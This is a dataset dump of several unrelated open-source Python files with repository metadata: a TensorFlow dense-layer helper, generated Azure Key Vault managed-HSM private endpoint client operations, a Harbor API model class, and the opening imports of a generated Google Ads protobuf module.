319a8ecd8143da437cd5720b73ed24a1a396c1cc | 2f09e893c3a21f4a17c95b99446d1efbf0b109f7 | /huaytools/tensorflow/layers/__init__.py | 6f45582415c893a8cb74a1d2dd931b0b6805be10 | [
"MIT"
] | permissive | knight134/huaytools | b19f0078e724963415c63d60218ae3cc624f598a | cbecd6771c05f8241e756a7619047589397b16d3 | refs/heads/master | 2020-04-24T18:30:27.732740 | 2018-05-27T13:51:24 | 2018-05-27T13:51:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,595 | py | """
"""
import tensorflow as tf
import tensorlayer as tl
# from .cnn import *
# from .rnn import *
from .attention import *
from .embedding import *
logging = tf.logging
def dense(inputs, n_units,
activation=tf.nn.relu,
use_bias=True,
W_init=tf.truncated_normal_initializer(stddev=0.1),
W_init_args=None,
b_init=tf.constant_initializer(value=0.0),
b_init_args=None,
name="dense",
reuse=None):
"""全连接层
input_shape: [batch_size, n_features]
output_shape: [batch_size, n_units]
References:
tf.layers.Dense
tl.layers.DenseLayer
"""
W_init_args = {} if W_init_args is None else W_init_args
b_init_args = {} if b_init_args is None else b_init_args
logging.info("DenseLayer: %s - n_units: %d activation: %s" % (name, n_units, activation.__name__))
# n_inputs = int(tf.convert_to_tensor(inputs).get_shape()[-1])
inputs = tf.convert_to_tensor(inputs)
n_inputs = inputs.get_shape()[-1].value
with tf.variable_scope(name, reuse=reuse):
W = tf.get_variable('W', shape=[n_inputs, n_units], initializer=W_init, dtype=tf.float32,
**W_init_args)
if use_bias:
b = tf.get_variable('b', shape=[n_units], initializer=b_init, dtype=tf.float32,
**b_init_args)
# outputs = act(tf.matmul(inputs, W) + b)
outputs = activation(tf.nn.xw_plus_b(inputs, W, b))
else:
outputs = activation(tf.matmul(inputs, W))
return outputs
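
# Usage sketch (added; not from the original module). Assumes TF1-style graph
# mode, which matches the tf.get_variable/variable_scope API used above:
#
#   x = tf.placeholder(tf.float32, [None, 128])
#   h = dense(x, 64, name="fc1")
#   logits = dense(h, 10, activation=tf.identity, name="fc2")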
| [
"[email protected]"
] | |
1548d5d2f9a1f0420dc18688bb58d6d32b25877a | bad62c2b0dfad33197db55b44efeec0bab405634 | /sdk/keyvault/azure-mgmt-keyvault/azure/mgmt/keyvault/v2021_10_01/operations/_mhsm_private_endpoint_connections_operations.py | 071dc770d7741dd509f07515c1cb63522e1d153e | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
] | permissive | test-repo-billy/azure-sdk-for-python | 20c5a2486456e02456de17515704cb064ff19833 | cece86a8548cb5f575e5419864d631673be0a244 | refs/heads/master | 2022-10-25T02:28:39.022559 | 2022-10-18T06:05:46 | 2022-10-18T06:05:46 | 182,325,031 | 0 | 0 | MIT | 2019-07-25T22:28:52 | 2019-04-19T20:59:15 | Python | UTF-8 | Python | false | false | 26,266 | py | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Iterable, Optional, TypeVar, Union, cast
from msrest import Serializer
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_by_resource_request(
subscription_id: str,
resource_group_name: str,
name: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2021-10-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.KeyVault/managedHSMs/{name}/privateEndpointConnections") # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"name": _SERIALIZER.url("name", name, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_get_request(
subscription_id: str,
resource_group_name: str,
name: str,
private_endpoint_connection_name: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2021-10-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.KeyVault/managedHSMs/{name}/privateEndpointConnections/{privateEndpointConnectionName}") # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"name": _SERIALIZER.url("name", name, 'str'),
"privateEndpointConnectionName": _SERIALIZER.url("private_endpoint_connection_name", private_endpoint_connection_name, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_put_request(
subscription_id: str,
resource_group_name: str,
name: str,
private_endpoint_connection_name: str,
*,
json: Optional[_models.MHSMPrivateEndpointConnection] = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2021-10-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', None)) # type: Optional[str]
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.KeyVault/managedHSMs/{name}/privateEndpointConnections/{privateEndpointConnectionName}") # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"name": _SERIALIZER.url("name", name, 'str'),
"privateEndpointConnectionName": _SERIALIZER.url("private_endpoint_connection_name", private_endpoint_connection_name, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
if content_type is not None:
_headers['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PUT",
url=_url,
params=_params,
headers=_headers,
json=json,
content=content,
**kwargs
)
def build_delete_request_initial(
subscription_id: str,
resource_group_name: str,
name: str,
private_endpoint_connection_name: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2021-10-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.KeyVault/managedHSMs/{name}/privateEndpointConnections/{privateEndpointConnectionName}") # pylint: disable=line-too-long
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"name": _SERIALIZER.url("name", name, 'str'),
"privateEndpointConnectionName": _SERIALIZER.url("private_endpoint_connection_name", private_endpoint_connection_name, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="DELETE",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
class MHSMPrivateEndpointConnectionsOperations:
"""
.. warning::
**DO NOT** instantiate this class directly.
Instead, you should access the following operations through
:class:`~azure.mgmt.keyvault.v2021_10_01.KeyVaultManagementClient`'s
:attr:`mhsm_private_endpoint_connections` attribute.
"""
models = _models
def __init__(self, *args, **kwargs):
input_args = list(args)
self._client = input_args.pop(0) if input_args else kwargs.pop("client")
self._config = input_args.pop(0) if input_args else kwargs.pop("config")
self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
@distributed_trace
def list_by_resource(
self,
resource_group_name: str,
name: str,
**kwargs: Any
) -> Iterable[_models.MHSMPrivateEndpointConnectionsListResult]:
"""The List operation gets information about the private endpoint connections associated with the
managed HSM Pool.
:param resource_group_name: Name of the resource group that contains the managed HSM pool.
:type resource_group_name: str
:param name: Name of the managed HSM Pool.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either MHSMPrivateEndpointConnectionsListResult or the
result of cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateEndpointConnectionsListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2021-10-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.MHSMPrivateEndpointConnectionsListResult]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_resource_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
name=name,
api_version=api_version,
template_url=self.list_by_resource.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
else:
request = build_list_by_resource_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
name=name,
api_version=api_version,
template_url=next_link,
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("MHSMPrivateEndpointConnectionsListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ManagedHsmError, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_resource.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.KeyVault/managedHSMs/{name}/privateEndpointConnections"} # type: ignore
@distributed_trace
def get(
self,
resource_group_name: str,
name: str,
private_endpoint_connection_name: str,
**kwargs: Any
) -> _models.MHSMPrivateEndpointConnection:
"""Gets the specified private endpoint connection associated with the managed HSM Pool.
:param resource_group_name: Name of the resource group that contains the managed HSM pool.
:type resource_group_name: str
:param name: Name of the managed HSM Pool.
:type name: str
:param private_endpoint_connection_name: Name of the private endpoint connection associated
with the managed hsm pool.
:type private_endpoint_connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MHSMPrivateEndpointConnection, or the result of cls(response)
:rtype: ~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateEndpointConnection
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2021-10-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.MHSMPrivateEndpointConnection]
request = build_get_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
name=name,
private_endpoint_connection_name=private_endpoint_connection_name,
api_version=api_version,
template_url=self.get.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ManagedHsmError, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('MHSMPrivateEndpointConnection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.KeyVault/managedHSMs/{name}/privateEndpointConnections/{privateEndpointConnectionName}"} # type: ignore
@distributed_trace
def put(
self,
resource_group_name: str,
name: str,
private_endpoint_connection_name: str,
properties: _models.MHSMPrivateEndpointConnection,
**kwargs: Any
) -> _models.MHSMPrivateEndpointConnection:
"""Updates the specified private endpoint connection associated with the managed hsm pool.
:param resource_group_name: Name of the resource group that contains the managed HSM pool.
:type resource_group_name: str
:param name: Name of the managed HSM Pool.
:type name: str
:param private_endpoint_connection_name: Name of the private endpoint connection associated
with the managed hsm pool.
:type private_endpoint_connection_name: str
:param properties: The intended state of private endpoint connection.
:type properties: ~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateEndpointConnection
:keyword callable cls: A custom type or function that will be passed the direct response
:return: MHSMPrivateEndpointConnection, or the result of cls(response)
:rtype: ~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateEndpointConnection
:raises: ~azure.core.exceptions.HttpResponseError
"""
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2021-10-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', "application/json")) # type: Optional[str]
cls = kwargs.pop('cls', None) # type: ClsType[_models.MHSMPrivateEndpointConnection]
_json = self._serialize.body(properties, 'MHSMPrivateEndpointConnection')
request = build_put_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
name=name,
private_endpoint_connection_name=private_endpoint_connection_name,
api_version=api_version,
content_type=content_type,
json=_json,
template_url=self.put.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
response_headers = {}
response_headers['Retry-After']=self._deserialize('int', response.headers.get('Retry-After'))
response_headers['Azure-AsyncOperation']=self._deserialize('str', response.headers.get('Azure-AsyncOperation'))
deserialized = self._deserialize('MHSMPrivateEndpointConnection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
put.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.KeyVault/managedHSMs/{name}/privateEndpointConnections/{privateEndpointConnectionName}"} # type: ignore
def _delete_initial(
self,
resource_group_name: str,
name: str,
private_endpoint_connection_name: str,
**kwargs: Any
) -> Optional[_models.MHSMPrivateEndpointConnection]:
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}) or {})
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2021-10-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[Optional[_models.MHSMPrivateEndpointConnection]]
request = build_delete_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
name=name,
private_endpoint_connection_name=private_endpoint_connection_name,
api_version=api_version,
template_url=self._delete_initial.metadata['url'],
headers=_headers,
params=_params,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url) # type: ignore
pipeline_response = self._client._pipeline.run( # type: ignore # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
response_headers = {}
if response.status_code == 200:
deserialized = self._deserialize('MHSMPrivateEndpointConnection', pipeline_response)
if response.status_code == 202:
response_headers['Retry-After']=self._deserialize('int', response.headers.get('Retry-After'))
response_headers['Location']=self._deserialize('str', response.headers.get('Location'))
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
_delete_initial.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.KeyVault/managedHSMs/{name}/privateEndpointConnections/{privateEndpointConnectionName}"} # type: ignore
@distributed_trace
def begin_delete(
self,
resource_group_name: str,
name: str,
private_endpoint_connection_name: str,
**kwargs: Any
) -> LROPoller[_models.MHSMPrivateEndpointConnection]:
"""Deletes the specified private endpoint connection associated with the managed hsm pool.
:param resource_group_name: Name of the resource group that contains the managed HSM pool.
:type resource_group_name: str
:param name: Name of the managed HSM Pool.
:type name: str
:param private_endpoint_connection_name: Name of the private endpoint connection associated
with the managed hsm pool.
:type private_endpoint_connection_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be ARMPolling. Pass in False for this
operation to not poll, or pass in your own initialized polling object for a personal polling
strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of LROPoller that returns either MHSMPrivateEndpointConnection or the
result of cls(response)
:rtype:
~azure.core.polling.LROPoller[~azure.mgmt.keyvault.v2021_10_01.models.MHSMPrivateEndpointConnection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
_headers = kwargs.pop("headers", {}) or {}
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2021-10-01")) # type: str
cls = kwargs.pop('cls', None) # type: ClsType[_models.MHSMPrivateEndpointConnection]
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial( # type: ignore
resource_group_name=resource_group_name,
name=name,
private_endpoint_connection_name=private_endpoint_connection_name,
api_version=api_version,
cls=lambda x,y,z: x,
headers=_headers,
params=_params,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('MHSMPrivateEndpointConnection', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True:
polling_method = cast(PollingMethod, ARMPolling(
lro_delay,
**kwargs
)) # type: PollingMethod
elif polling is False: polling_method = cast(PollingMethod, NoPolling())
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.KeyVault/managedHSMs/{name}/privateEndpointConnections/{privateEndpointConnectionName}"} # type: ignore
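
# Illustrative call pattern (added; not part of the generated client). Assumes
# a KeyVaultManagementClient wired with credentials, as produced by the SDK:
#
#   poller = client.mhsm_private_endpoint_connections.begin_delete(
#       resource_group_name="rg", name="hsm-pool",
#       private_endpoint_connection_name="pec")
#   connection = poller.result()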
| [
"[email protected]"
] | |
afeebd636416a886d7f9ed90d354fd7b7d02c895 | 71cc3524493e30366f122fdbdfd4260ca0ae8934 | /harbor_client/model/retention_policy_scope.py | c7b1ef5000b7ed44731db1b1367749fcd29b7d6f | [] | no_license | moule3053/harbor-python-client-api | f293a42bac0e2eee54d43d89af12fb215146bd06 | 31abc14deaf6bb62badc4d9a7b687c60e6fc99eb | refs/heads/master | 2023-08-24T23:16:45.144820 | 2021-10-11T22:54:36 | 2021-10-11T22:54:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,210 | py | """
Harbor API
These APIs provide services for manipulating Harbor project. # noqa: E501
The version of the OpenAPI document: 2.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from harbor_client.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
from ..model_utils import OpenApiModel
from harbor_client.exceptions import ApiAttributeError
class RetentionPolicyScope(ModelNormal):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
}
validations = {
}
@cached_property
def additional_properties_type():
"""
        This must be a method because a model may have properties that are
        of type self, so it must run after the class is loaded.
"""
return (bool, date, datetime, dict, float, int, list, str, none_type,) # noqa: E501
_nullable = False
@cached_property
def openapi_types():
"""
        This must be a method because a model may have properties that are
        of type self, so it must run after the class is loaded.
Returns
openapi_types (dict): The key is attribute name
and the value is attribute type.
"""
return {
'level': (str,), # noqa: E501
'ref': (int,), # noqa: E501
}
@cached_property
def discriminator():
return None
attribute_map = {
'level': 'level', # noqa: E501
'ref': 'ref', # noqa: E501
}
read_only_vars = {
}
_composed_schemas = {}
@classmethod
@convert_js_args_to_python_args
def _from_openapi_data(cls, *args, **kwargs): # noqa: E501
"""RetentionPolicyScope - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
                When traveling through a discriminator, the composed schema
                that is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
level (str): [optional] # noqa: E501
ref (int): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
self = super(OpenApiModel, cls).__new__(cls)
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
return self
required_properties = set([
'_data_store',
'_check_type',
'_spec_property_naming',
'_path_to_item',
'_configuration',
'_visited_composed_classes',
])
@convert_js_args_to_python_args
def __init__(self, *args, **kwargs): # noqa: E501
"""RetentionPolicyScope - a model defined in OpenAPI
Keyword Args:
_check_type (bool): if True, values for parameters in openapi_types
will be type checked and a TypeError will be
raised if the wrong type is input.
Defaults to True
_path_to_item (tuple/list): This is a list of keys or values to
drill down to the model in received_data
when deserializing a response
_spec_property_naming (bool): True if the variable names in the input data
are serialized names, as specified in the OpenAPI document.
False if the variable names in the input data
are pythonic names, e.g. snake case (default)
_configuration (Configuration): the instance to use when
deserializing a file_type parameter.
If passed, type conversion is attempted
If omitted no type conversion is done.
_visited_composed_classes (tuple): This stores a tuple of
classes that we have traveled through so that
if we see that class again we will not use its
discriminator again.
                When traveling through a discriminator, the composed schema
                that is traveled through is added to this set.
For example if Animal has a discriminator
petType and we pass in "Dog", and the class Dog
allOf includes Animal, we move through Animal
once using the discriminator, and pick Dog.
Then in Dog, we will make an instance of the
Animal class but this time we won't travel
through its discriminator because we passed in
_visited_composed_classes = (Animal,)
level (str): [optional] # noqa: E501
ref (int): [optional] # noqa: E501
"""
_check_type = kwargs.pop('_check_type', True)
_spec_property_naming = kwargs.pop('_spec_property_naming', False)
_path_to_item = kwargs.pop('_path_to_item', ())
_configuration = kwargs.pop('_configuration', None)
_visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
if args:
raise ApiTypeError(
"Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments." % (
args,
self.__class__.__name__,
),
path_to_item=_path_to_item,
valid_classes=(self.__class__,),
)
self._data_store = {}
self._check_type = _check_type
self._spec_property_naming = _spec_property_naming
self._path_to_item = _path_to_item
self._configuration = _configuration
self._visited_composed_classes = _visited_composed_classes + (self.__class__,)
for var_name, var_value in kwargs.items():
if var_name not in self.attribute_map and \
self._configuration is not None and \
self._configuration.discard_unknown_keys and \
self.additional_properties_type is None:
# discard variable.
continue
setattr(self, var_name, var_value)
if var_name in self.read_only_vars:
raise ApiAttributeError(f"`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate "
f"class with read only attributes.")
| [ "[email protected]" ] | |
da9a073d426253f4f74df5f982a4c0fd2cf697bd | a81c1492783e7cafcaf7da5f0402d2d283b7ce37 | /google/ads/google_ads/v6/proto/resources/ad_group_criterion_pb2.py | 6a447067f79a24f9a96374b62dd4f696aab9a5b9 | ["Apache-2.0"] | permissive | VincentFritzsche/google-ads-python | 6650cf426b34392d1f58fb912cb3fc25b848e766 | 969eff5b6c3cec59d21191fa178cffb6270074c3 | refs/heads/master | 2023-03-19T17:23:26.959021 | 2021-03-18T18:18:38 | 2021-03-18T18:18:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | true | 66,824 | py |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads/v6/resources/ad_group_criterion.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.ads.google_ads.v6.proto.common import criteria_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2
from google.ads.google_ads.v6.proto.common import custom_parameter_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_common_dot_custom__parameter__pb2
from google.ads.google_ads.v6.proto.enums import ad_group_criterion_approval_status_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_ad__group__criterion__approval__status__pb2
from google.ads.google_ads.v6.proto.enums import ad_group_criterion_status_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_ad__group__criterion__status__pb2
